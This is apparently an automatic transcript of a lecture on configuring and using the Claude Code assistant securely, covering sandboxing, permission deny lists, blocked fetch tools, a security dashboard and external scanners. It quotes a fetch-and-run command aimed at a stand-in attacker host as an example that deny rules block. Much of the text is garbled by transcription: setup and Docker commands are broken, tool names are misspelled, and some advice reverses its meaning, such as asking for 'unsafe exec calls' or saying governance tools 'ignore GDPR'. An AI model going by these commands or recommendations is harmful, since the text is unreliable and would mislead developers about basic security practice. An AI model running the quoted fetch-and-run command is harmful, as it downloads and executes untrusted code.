Welcome to our lecture on code security with Claude Code. In this session, we will delve into a comprehensive practical guide that will aid you in setting up, configuring, and using Claude Code. This tool is designed to help you produce secure, vulnerability-free software, and the best part is it doesn't require you to sacrifice your developer velocity. When we talk about security in Claude Code, we're discussing a practical guide that will empower you to ensure your code is robust and safe from potential vulnerabilities. It's crucial to understand that secure coding doesn't have to slow you down. In fact, with the right tools like Claude Code and the proper guidance, you can maintain your development speed while also bolstering your code security. So let's delve into this practical guide and learn how to harness the power of Claude Code for secure software development. Let's dive into the concept of Claude Code. Claude Code is an AI-powered coding assistant developed by Anthropic which can be integrated directly into your terminal. What makes Claude Code exceptionally powerful is its ability to understand entire code bases, coordinate edits across multiple files, and run autonomous workflows. However, it is crucial to think of Claude Code as an untrusted but powerful intern. It is capable of doing great things but requires guardrails, oversight, and minimal access. Just like an intern, it needs guidance and constraints to ensure it operates effectively and securely. Now, Claude Code exhibits three key features. Firstly, it conducts a deep codebase analysis. This means it has the ability to understand context across hundreds of files, which can be invaluable in large, complex projects. Secondly, it has the capability to run autonomous workflows. This means it can execute multi-step tasks with minimal hand-holding from the developer, thus enhancing your efficiency in coding. And thirdly, Claude Code operates on a permission-based system. It is read-only by default and requires explicit approval for edits. This feature is critical in maintaining the security and integrity of your codebase. So that's Claude Code in a nutshell, an AI-powered assistant that can save you time and effort, but one that needs to be used with caution to ensure secure and effective operation. Moving on to some core security concepts that are crucial in understanding how Claude Code operates. Firstly, we have a permission-based architecture. This means that Claude operates on strict read-only defaults. Every test, edit, or command execution that Claude performs requires your explicit approval before he acts. This ensures that you have full control over what changes are made in your codebase. Secondly, there's a defense mechanism against prompt injection. Malicious inputs attempting to override Claude's behavior are immediately flagged. Input sanitization is employed to block any command injection attacks, adding an extra layer of security. Thirdly, we have context-aware protections. Claude isn't just looking at individual components, he analyzes the full request context to detect any potential harm. This means that even if individual components appear benign, Claude can identify harmful patterns when viewed in the broader context. Lastly, we have to be aware of the shadow AI risk. Shadow AI refers to unmonitored usage of Claude within an organization. Without proper governance, it can potentially lead to data leaks and compliance violations. So these are the four core security concepts that are important to understand when working with Claude Code. The permission-based architecture defends against prompt injection, context-aware protections, and awareness of shadow AI risk. All these concepts contribute to making Claude Code a secure and reliable coding assistant. In this section of the course, we'll be discussing how to set up Claude Code in a secure manner. Let's start with the first step, installing Claude Code to confine all rights to a subfolder only. You should install Claude in an isolated directory using the command Claude Code start my project. Next, let's talk about enabling sandboxing. For operating system level isolation, you can utilize Docker or Podman. It is crucial to restrict file system access, particularly blocking paths like sysctl with other directories that may contain secrets. Now moving on to configuring credentials safely. You should always encrypt your API keys and tokens. Never resort to using plaintext end files. Instead, use a secrets vault for this purpose. Fourth, all hooks should be initially disabled. This is to prevent any unexpected persistence or side effects during your initial sessions. Finally, let's talk about a practical example by running Docker run. Able to workspace Claude Code, you can limit Claude's file system access to just your current working directory. So these are the steps to be followed while setting up Claude Code securely. Remember, security is never something to be taken lightly, and these steps ensure that Claude operates within the defined parameters, keeping your project and data safe. The permission system in Claude Code serves as your first line of defense. It employs the permissions JSON file to regulate what actions are permitted and which are not. Let's take a look at the structure of this file. As you can see, it's divided into two sections, allo and deny. The allo list contains actions that are deemed safe and are therefore explicitly permitted. For instance, reading Python files or executing Git commands. On the other hand, the deny list blocks potentially risky actions. This includes web fetches, certain bash commands, and reading from secret files. This list is unconditional and will block actions listed here no matter what. With this system, Claude Code defaults to a read-only state and requires explicit approval for any sensitive action, such as file writes, bash commands, or network access. This prevents unauthorized web fetches that could potentially inject malware into your workflow. Remember, the permission system is your first line of defense. Use it wisely to protect your code and your system. In this part of our course, we're going to delve into how Claude Code handles command execution and injection prevention. This is a fundamental component of the system's core protections. The command block list is an essential tool in this context. By default, web fetching tools such as curl and w are blocked. This means that any suspicious bash command requires manual approval before it can be executed. This is a crucial security feature that prevents unauthorized and potentially harmful actions. We also employ what we call fail close policy. In essence, this means that any unrecognized commands will require approval before they can be executed. Claude explains the intent of the command in plain English to ensure transparency and help you make an informed decision about whether to allow or deny the action. In addition, Claude Code has robust injection detection measures in place. All inputs are sanitized and checked for injection patterns, even those within illicit commands. For example, if you were to receive a prompt asking run git pull origin main, you would have the choice to approve or deny. However, if you were to attempt to execute a command like curl evil.com bash, it would be automatically blocked by a denialist rule. Finally, we highly recommend using once-off approvals as a best practice. This means that you should never enable persistent auto-approval for bash commands. This ensures that each potentially risky action is evaluated on a case-by-case basis, adding an extra layer of security to your system. We now move on to the Claude Code Security Dashboard. This powerful feature, available in both enterprise and team previews, has been developed using AI technology. It has the capability to scan your entire codebase, trace data flows, and suggest patches. Each patch comes with a severity rating and confidence score, ensuring you have all the information you need to make an informed decision. The process begins with a scan. This is a multi-stage verification process that filters out false positives across all files, ensuring only relevant and potentially harmful issues are brought to your attention. Once the scan is complete, it's time to review the findings. The dashboard surfaces these findings and suggested patches for your approval. This phase is crucial as it allows for human verification and intervention where necessary. After the review, the next step is fixing. Here, you iterate with your existing tools. The great thing is Claude integrates seamlessly into your existing pipeline, making the process smooth and efficient. To give an idea of the real-world impact, Claude's dashboard has found over 500 high-severity bugs in open-source repositories. These bugs had survived expert code reviews for decades. As an example, an ejection in legacy code was detected with 95% confidence. So the Claude Code Security Dashboard is not just a theoretical tool, it has proven its effectiveness in the real world, finding and fixing serious code issues. And remember, always use once-off approvals and never enable persistent auto-approval for bash commands. Let's focus now on the principles of writing secure prompts when using the Claude system. Precision and scope are key. Vague prompts can often lead to unpredictable outputs, and we certainly want to avoid that. It's also critical to never include any API keys, credentials, or sensitive data in your prompts. Always make sure to request secure defaults in every generation task, and remember to treat all generated code as unverified until it has been reviewed. To give you some practical examples, instead of a vague command, use a more precise one like generate Python with input validation and unsafe exec calls, or refactor this function securely. Avoid the values parameterized queries only. You can also ask Claude to include bounds checks and sanitize inputs throughout. For comprehensive coverage, you can pair output from Claude with other security tools. For instance, use SEMREP for static analysis and OWASP for dynamic testing. These tools can help you ensure the security of your codebase beyond what Claude can do alone. So always remember these principles when writing prompts for Claude. It's not just about getting the code you need, but making sure that code is as secure as possible. Let's now delve into the topic of layering external security tools. The concept of layering security tools is like adding multiple layers of defense to your application. Firstly, we have static application security testing, or SAS, which is exemplified by tools like SEMREP. SEMREP scans for insecure constructs right at the source level. It's a good practice to run SEMREP with the security rules configuration after each Claude session. Next, we have dynamic application security testing, or DAS, represented by tools such as OWASP. SAP performs runtime testing, which is crucial for catching vulnerabilities like SQL injection and cross-site scripting during execution. You can use the ZAP baseline, Pi command with the target of your local host for any generated ABIs. Lastly, AI governance with tools like Rico and Nomaze, a critical measure to implement. These tools help detect shadow AI usage, flag prompt misuse, cross-app access, and most importantly, they ignore GDPR, HIPAA, and SOC audit logging automatically. This is incredibly important for maintaining compliance and ensuring responsible AI usage. By layering these external security tools, you can build a robust and secure application environment. Now we're moving on to real-world scenarios and pitfalls. It's important to understand these to help you better navigate potential challenges. Let's first discuss some common scenarios. For instance, prompt injection can lead to secret information leaks. To mitigate this, you need to implement input sanitization and enforce strict deny lists to prevent any attempts to override the system. Another scenario involves backdoors in the generated code. To mitigate this risk, it's recommended to regularly review your dashboard and run an external SAS scan before merging any AI output. Now let's talk about some critical pitfalls which we should avoid at all costs. One such pitfall is over-permissive auto-approvals. It's important to remember to never set persistent approval for bash. Always review before approving. Another critical pitfall is not having a sandbox, which can lead to full system access. Without Docker isolation, Fog can read and write your entire system, which is a significant security risk. Lastly, unvetted MCP servers can also pose a risk. Third-party tools like unreviewed GitHub integrations can introduce supply chain risks, so it's vital to vet all third-party tools and servers thoroughly. By understanding these scenarios and pitfalls, you can better prepare and protect your systems, ensuring a more secure environment for your operations. In this slide, we're summarizing the top 5 best practices for secure and compliant AI development. First, audit logs are crucial. Make sure to log all Claude activity to an RGDR, HIPAA, and SOC 2 compliance. Second, secure your prompts. Be precise, never include secrets, and always request safe by default code generation. Third, layer your tools. Combine Claude with SAS, DAS, and AI governance monitors for a robust line of defense. Fourth, review everything. Treat every command output and suggested patches untrusted until verified by a human. Lastly, use minimal permissions. Start with an LList and Docker sandbox. Grant the least access needed to complete each task. These practices will help to ensure a secure and efficient development process, reducing risks and enhancing productivity. As we venture into the next steps of getting started safely with Claude Code, there are a few key points to consider. Firstly, experiment in Docker. This involves spinning up an isolated container and mounting only your project directory. This will allow you to run your first Claude Code session with full confidence, knowing that your environment is securely contained. Secondly, for teams and enterprises, it's highly recommended to enable the security dashboard. This is a crucial step that activates automated vulnerability scanning across your repositories. This provides an ongoing audit and an extra layer of security as your projects evolve. Thirdly, it's important to disclose responsibly. When using Claude Code, you may come across vulnerabilities in your code or others. In such instances, it's vital to follow responsible disclosure guidelines before publicly sharing your findings. This maintains a level of respect and security for all involved parties. Remember, the goal of secure, productive AI-assisted development isn't about limiting AI potential. It's about combining the power of AI with rigorous, layered human controls. This balance ensures an effective and secure AI-assisted development environment.